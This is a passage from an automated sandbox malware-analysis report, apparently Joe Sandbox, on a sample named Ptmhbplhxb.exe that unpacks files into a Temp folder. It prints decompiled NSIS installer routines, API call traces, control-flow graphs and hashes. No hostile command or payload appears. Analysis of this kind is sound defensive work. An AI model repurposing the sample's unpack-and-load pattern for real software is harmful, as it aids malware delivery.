                • lstrcatA.KERNEL32(00000000,00000000,C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp\pdzaicbnewkzt.exe.config,C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp,00000000,00000000,00000031), ref: 00401798
                • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp\pdzaicbnewkzt.exe.config,C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp\pdzaicbnewkzt.exe.config,00000000,00000000,C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp\pdzaicbnewkzt.exe.config,C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp,00000000,00000000,00000031), ref: 004017C2
                  • Part of subcall function 00405F65: lstrcpynA.KERNEL32(?,?,00000400,004032C3,Setup Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F72
                  • Part of subcall function 0040508C: lstrlenA.KERNEL32(0042A050,00000000,00419517,772EEA30,?,?,?,?,?,?,?,?,?,004030DC,00000000,?), ref: 004050C5
                  • Part of subcall function 0040508C: lstrlenA.KERNEL32(004030DC,0042A050,00000000,00419517,772EEA30,?,?,?,?,?,?,?,?,?,004030DC,00000000), ref: 004050D5
                  • Part of subcall function 0040508C: lstrcatA.KERNEL32(0042A050,004030DC,004030DC,0042A050,00000000,00419517,772EEA30), ref: 004050E8
                  • Part of subcall function 0040508C: SetWindowTextA.USER32(0042A050,0042A050), ref: 004050FA
                  • Part of subcall function 0040508C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405120
                  • Part of subcall function 0040508C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040513A
                  • Part of subcall function 0040508C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405148
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                • String ID: C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp$C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp\nsExec.dll$C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp\pdzaicbnewkzt.exe.config
                • API String ID: 1941528284-1111951767
                • Opcode ID: 31c0dc35165cd9c2c81e055de88f8ba7219800017b80078377aa7409dfa41ea4
                • Instruction ID: 024705dcfdf044f05b4b82656432081f20986447a00b4521f0a60d415ab43704
                • Opcode Fuzzy Hash: 31c0dc35165cd9c2c81e055de88f8ba7219800017b80078377aa7409dfa41ea4
                • Instruction Fuzzy Hash: 4841B431A04515BECB107BB58C45EAF3679EF05369F60833BF421F20E1D67C89428A6D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405552 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 471 405552-40559d CreateDirectoryA 472 4055a3-4055b0 GetLastError 471->472 473 40559f-4055a1 471->473 474 4055b2-4055c6 SetFileSecurityA 472->474 475 4055ca-4055cc 472->475 473->475 474->473 476 4055c8 GetLastError 474->476 476->475
                C-Code - Quality: 100%
                			E00405552(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x408374;
				_v36.Group = 0x408374;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x408364;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                0x0040555d
                0x00405561
                0x00405564
                0x0040556a
                0x0040556e
                0x00405572
                0x0040557a
                0x00405581
                0x00405587
                0x0040558e
                0x00405595
                0x0040559d
                0x0040559f
                0x00000000
                0x0040559f
                0x004055a9
                0x004055b0
                0x004055c6
                0x00000000
                0x00000000
                0x00000000
                0x004055c8
                0x004055cc

                APIs
                • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\), ref: 00405595
                • GetLastError.KERNEL32 ref: 004055A9
                • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004055BE
                • GetLastError.KERNEL32 ref: 004055C8
                Strings
                • C:\Users\user\Desktop, xrefs: 00405552
                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405578
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: ErrorLast$CreateDirectoryFileSecurity
                • String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop
                • API String ID: 3449924974-2752704311
                • Opcode ID: 5ed0d1f38f2075833211856a8ebf7d2689aced5b3dcb66e6179e3f4d9a7ce916
                • Instruction ID: d93b5df8f7ffc7c008eac1e7bdc238e6dcac3e6f5ce479452586b7e310885e58
                • Opcode Fuzzy Hash: 5ed0d1f38f2075833211856a8ebf7d2689aced5b3dcb66e6179e3f4d9a7ce916
                • Instruction Fuzzy Hash: 550108B1C00219EADF11DBA1CD047EFBFB9EF04354F00803AD545B6290D77896088FA9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040628F Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 477 40628f-4062af GetSystemDirectoryA 478 4062b1 477->478 479 4062b3-4062b5 477->479 478->479 480 4062c5-4062c7 479->480 481 4062b7-4062bf 479->481 482 4062c8-4062fa wsprintfA LoadLibraryExA 480->482 481->480 483 4062c1-4062c3 481->483 483->482
                C-Code - Quality: 100%
                			E0040628F(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x40a014; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}








                0x004062a6
                0x004062af
                0x004062b1
                0x004062b1
                0x004062b5
                0x004062c7
                0x004062c1
                0x004062c1
                0x004062c1
                0x004062cb
                0x004062df
                0x004062f3
                0x004062fa

                APIs
                • GetSystemDirectoryA.KERNEL32 ref: 004062A6
                • wsprintfA.USER32 ref: 004062DF
                • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004062F3
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: DirectoryLibraryLoadSystemwsprintf
                • String ID: %s%s.dll$UXTHEME$\
                • API String ID: 2200240437-4240819195
                • Opcode ID: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
                • Instruction ID: 90c405808a5079913e9fc86ee6967ca4c100a0af48b71fe7beb271d56a4ee20c
                • Opcode Fuzzy Hash: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
                • Instruction Fuzzy Hash: 89F0F630510609AADB15AB64DD0DFEB365CAB08304F1405BEA686F11C1EA78E9398B99
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405B2D Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 484 405b2d-405b37 485 405b38-405b63 GetTickCount GetTempFileNameA 484->485 486 405b72-405b74 485->486 487 405b65-405b67 485->487 489 405b6c-405b6f 486->489 487->485 488 405b69 487->488 488->489
                C-Code - Quality: 100%
                			E00405B2D(char _a4, intOrPtr _a6, CHAR* _a8) {
				char _t11;
				signed int _t12;
				int _t15;
				signed int _t17;
				void* _t20;
				CHAR* _t21;

				_t21 = _a4;
				_t20 = 0x64;
				while(1) {
					_t11 =  *0x40a3b4; // 0x61736e
					_t20 = _t20 - 1;
					_a4 = _t11;
					_t12 = GetTickCount();
					_t17 = 0x1a;
					_a6 = _a6 + _t12 % _t17;
					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
					if(_t15 != 0) {
						break;
					}
					if(_t20 != 0) {
						continue;
					}
					 *_t21 =  *_t21 & 0x00000000;
					return _t15;
				}
				return _t21;
			}









                0x00405b31
                0x00405b37
                0x00405b38
                0x00405b38
                0x00405b3d
                0x00405b3e
                0x00405b41
                0x00405b4b
                0x00405b58
                0x00405b5b
                0x00405b63
                0x00000000
                0x00000000
                0x00405b67
                0x00000000
                0x00000000
                0x00405b69
                0x00000000
                0x00405b69
                0x00000000

                APIs
                • GetTickCount.KERNEL32 ref: 00405B41
                • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405B5B
                Strings
                • "C:\Users\user\Desktop\Ptmhbplhxb.exe", xrefs: 00405B2D
                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405B30
                • nsa, xrefs: 00405B38
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: CountFileNameTempTick
                • String ID: "C:\Users\user\Desktop\Ptmhbplhxb.exe"$C:\Users\user~1\AppData\Local\Temp\$nsa
                • API String ID: 1716503409-3543304719
                • Opcode ID: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
                • Instruction ID: 439a7608ba980c1fff97265348ba0c774925dff8d33d3cb941cf273fff524f8a
                • Opcode Fuzzy Hash: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
                • Instruction Fuzzy Hash: B0F082363042086BDB108F66DD04B9B7BA9DF91750F14803BFA48AA280D6B4E9588799
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004059EB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46stringCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 490 4059eb-405a06 call 405f65 call 405996 495 405a08-405a0a 490->495 496 405a0c-405a19 call 4061cf 490->496 497 405a5e-405a60 495->497 500 405a25-405a27 496->500 501 405a1b-405a1f 496->501 503 405a3d-405a46 lstrlenA 500->503 501->495 502 405a21-405a23 501->502 502->495 502->500 504 405a48-405a5c call 4058fd GetFileAttributesA 503->504 505 405a29-405a30 call 406268 503->505 504->497 510 405a32-405a35 505->510 511 405a37-405a38 call 405944 505->511 510->495 510->511 511->503
                C-Code - Quality: 53%
                			E004059EB(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E00405F65(0x42bc78, _a4);
				_t21 = E00405996(0x42bc78);
				if(_t21 != 0) {
					E004061CF(_t21);
					if(( *0x42f41c & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x42bc78;
						while(1) {
							_t11 = lstrlenA(0x42bc78);
							_push(0x42bc78);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E00406268();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405944(0x42bc78);
								continue;
							} else {
								goto L1;
							}
						}
						E004058FD();
						_t16 = GetFileAttributesA(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}









                0x004059f7
                0x00405a02
                0x00405a06
                0x00405a0d
                0x00405a19
                0x00405a25
                0x00405a25
                0x00405a3d
                0x00405a3e
                0x00405a45
                0x00405a46
                0x00000000
                0x00000000
                0x00405a29
                0x00405a30
                0x00405a38
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00405a30
                0x00405a48
                0x00405a4e
                0x00000000
                0x00405a5c
                0x00405a1b
                0x00405a1f
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00405a1f
                0x00405a08
                0x00000000

                APIs
                  • Part of subcall function 00405F65: lstrcpynA.KERNEL32(?,?,00000400,004032C3,Setup Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F72
                  • Part of subcall function 00405996: CharNextA.USER32(?,?,C:\,?,00405A02,C:\,C:\,772EFA90,?,C:\Users\user~1\AppData\Local\Temp\,0040574D,?,772EFA90,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 004059A4
                  • Part of subcall function 00405996: CharNextA.USER32(00000000), ref: 004059A9
                  • Part of subcall function 00405996: CharNextA.USER32(00000000), ref: 004059BD
                • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,772EFA90,?,C:\Users\user~1\AppData\Local\Temp\,0040574D,?,772EFA90,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405A3E
                • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,772EFA90,?,C:\Users\user~1\AppData\Local\Temp\,0040574D,?,772EFA90,C:\Users\user~1\AppData\Local\Temp\), ref: 00405A4E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                • String ID: C:\$C:\Users\user~1\AppData\Local\Temp\
                • API String ID: 3248276644-1077792641
                • Opcode ID: abce9bb9807016b4c276db8bae45b4b3eed95d690bc7d0fbdb1e72e6f8ad0fcb
                • Instruction ID: 1f06baf1138d21f74630751e728cacf5283a8138a78bcc2982ba797f27b9272c
                • Opcode Fuzzy Hash: abce9bb9807016b4c276db8bae45b4b3eed95d690bc7d0fbdb1e72e6f8ad0fcb
                • Instruction Fuzzy Hash: 53F0C831315DA256C622323A1D45AAF1B45CE87338709477FF891B12D2EB3C89439EBD
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401FFD Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 513 401ffd-402009 514 4020c4-4020c6 513->514 515 40200f-402025 call 402ac1 * 2 513->515 516 402237-40223c call 401423 514->516 526 402034-402042 LoadLibraryExA 515->526 527 402027-402032 GetModuleHandleA 515->527 522 402951-402960 516->522 523 402716-40271d 516->523 523->522 529 402044-402051 GetProcAddress 526->529 530 4020bd-4020bf 526->530 527->526 527->529 531 402090-402095 call 40508c 529->531 532 402053-402059 529->532 530->516 536 40209a-40209d 531->536 534 402072-40208e 532->534 535 40205b-402067 call 401423 532->535 534->536 535->536 544 402069-402070 535->544 536->522 540 4020a3-4020ab call 403755 536->540 540->522 545 4020b1-4020b8 FreeLibrary 540->545 544->536 545->522
                C-Code - Quality: 60%
                			E00401FFD(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x42f4d8");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42f4a8 =  *0x42f4a8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402AC1(0xfffffff0);
				 *(_t34 + 8) = E00402AC1(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E0040508C(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x430000, 0x40b81c, 0x40a000);
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E00403755(_t30) != 0) {
						FreeLibrary(_t30); // executed
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                0x00401ffd
                0x00401ffd
                0x00402002
                0x00402009
                0x004020c4
                0x00402237
                0x00402237
                0x00402951
                0x00402954
                0x00402960
                0x00402960
                0x00402018
                0x00402022
                0x00402025
                0x00402034
                0x00402038
                0x0040203e
                0x00402042
                0x004020bd
                0x00000000
                0x004020bd
                0x00402044
                0x0040204d
                0x00402051
                0x00402095
                0x00402053
                0x00402056
                0x00402059
                0x00402089
                0x0040205b
                0x0040205e
                0x00402067
                0x00402069
                0x00402069
                0x00402067
                0x00402059
                0x0040209d
                0x004020b2
                0x004020b2
                0x00000000
                0x0040209d
                0x00402028
                0x0040202e
                0x00402032
                0x00000000
                0x00000000
                0x00000000

                APIs
                • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00402028
                  • Part of subcall function 0040508C: lstrlenA.KERNEL32(0042A050,00000000,00419517,772EEA30,?,?,?,?,?,?,?,?,?,004030DC,00000000,?), ref: 004050C5
                  • Part of subcall function 0040508C: lstrlenA.KERNEL32(004030DC,0042A050,00000000,00419517,772EEA30,?,?,?,?,?,?,?,?,?,004030DC,00000000), ref: 004050D5
                  • Part of subcall function 0040508C: lstrcatA.KERNEL32(0042A050,004030DC,004030DC,0042A050,00000000,00419517,772EEA30), ref: 004050E8
                  • Part of subcall function 0040508C: SetWindowTextA.USER32(0042A050,0042A050), ref: 004050FA
                  • Part of subcall function 0040508C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405120
                  • Part of subcall function 0040508C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040513A
                  • Part of subcall function 0040508C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405148
                • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402038
                • GetProcAddress.KERNEL32(00000000,?), ref: 00402048
                • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B2
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                • String ID:
                • API String ID: 2987980305-0
                • Opcode ID: c269c81cb85478e00bfc3d4b8c9c0837da33454893b7d03bdc32fa3c52a9d6d9
                • Instruction ID: 3b54ba627a5d3606a08c88bc2c88048367fe0e0edc5ddf34d35ff9eabd327fef
                • Opcode Fuzzy Hash: c269c81cb85478e00bfc3d4b8c9c0837da33454893b7d03bdc32fa3c52a9d6d9
                • Instruction Fuzzy Hash: A721DB71A04225ABCF207FA48E49B6E7670AB14358F20413BFB11B62D0CBBD4942966E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004015BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 546 4015bb-4015ce call 402ac1 call 405996 551 4015d0-4015e3 call 405928 546->551 552 401624-401627 546->552 560 4015e5-4015e8 551->560 561 4015fb-4015fc call 4055cf 551->561 554 401652-40223c call 401423 552->554 555 401629-401644 call 401423 call 405f65 SetCurrentDirectoryA 552->555 567 402951-402960 554->567 568 402716-40271d 554->568 555->567 576 40164a-40164d 555->576 560->561 564 4015ea-4015f1 call 4055ec 560->564 571 401601-401603 561->571 564->561 580 4015f3-4015f4 call 405552 564->580 568->567 572 401605-40160a 571->572 573 40161a-401622 571->573 577 401617 572->577 578 40160c-401615 GetFileAttributesA 572->578 573->551 573->552 576->567 577->573 578->573 578->577 582 4015f9 580->582 582->571
                C-Code - Quality: 87%
                			E004015BB(char __ebx, void* __eflags) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402AC1(0xfffffff0);
				_t13 = E00405996(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E00405928(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E004055CF(_t28);
						} else {
							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004055EC(_t39) == 0) {
								goto L5;
							} else {
								_t22 = E00405552(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405F65("C:\\Users\\FRONTD~1\\AppData\\Local\\Temp\\nsq9535.tmp", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}













                0x004015bb
                0x004015c2
                0x004015c5
                0x004015ca
                0x004015ce
                0x004015d0
                0x004015d8
                0x004015da
                0x004015dc
                0x004015e0
                0x004015e3
                0x004015fb
                0x004015fc
                0x004015e5
                0x004015e5
                0x004015e8
                0x00000000
                0x004015f3
                0x004015f4
                0x004015f4
                0x004015e8
                0x00401603
                0x0040160a
                0x00401617
                0x00401617
                0x0040160c
                0x0040160d
                0x00401615
                0x00000000
                0x00000000
                0x00401615
                0x0040160a
                0x0040161a
                0x0040161d
                0x0040161f
                0x00401620
                0x004015d0
                0x00401627
                0x00401652
                0x00402237
                0x00401629
                0x0040162b
                0x00401636
                0x0040163c
                0x00401644
                0x0040164a
                0x0040164a
                0x00401644
                0x00402954
                0x00402960

                APIs
                  • Part of subcall function 00405996: CharNextA.USER32(?,?,C:\,?,00405A02,C:\,C:\,772EFA90,?,C:\Users\user~1\AppData\Local\Temp\,0040574D,?,772EFA90,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 004059A4
                  • Part of subcall function 00405996: CharNextA.USER32(00000000), ref: 004059A9
                  • Part of subcall function 00405996: CharNextA.USER32(00000000), ref: 004059BD
                • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                  • Part of subcall function 00405552: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\), ref: 00405595
                • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp,00000000,00000000,000000F0), ref: 0040163C
                Strings
                • C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp, xrefs: 00401631
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
